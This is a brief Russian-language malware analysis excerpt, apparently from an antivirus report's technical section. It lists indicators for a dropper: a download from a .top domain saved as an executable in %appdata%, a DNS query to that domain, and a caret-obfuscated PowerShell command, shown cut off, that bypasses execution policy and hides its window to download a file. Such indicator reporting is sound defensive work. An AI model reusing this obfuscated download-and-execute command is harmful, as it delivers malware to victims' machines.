Техническая информация
- http://hometowergop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^Er^She^lL.E^x^E ^-ExE^C^U^tIO^npoLIc^Y ^BYPAsS -nOP^ROFiLe^ ^-^W^I^nD^OwS^T^y^LE ^h^IdDen (n^eW^-o^bje^CT ^SYst^Em.^NeT.^wEBcLiEnt^).^D^o^w^nLO^a^DfI^lE^(^'http://hometower...
- DNS ASK ho####wergop.top
- '<SYSTEM32>\cmd.exe' /c "POw^Er^She^lL.E^x^E ^-ExE^C^U^tIO^npoLIc^Y ^BYPAsS -nOP^ROFiLe^ ^-^W^I^nD^OwS^T^y^LE ^h^IdDen (n^eW^-o^bje^CT ^SYst^Em.^NeT.^wEBcLiEnt^).^D^o^w^nLO^a^DfI^lE^(^'http://hometower...' (со скрытым окном)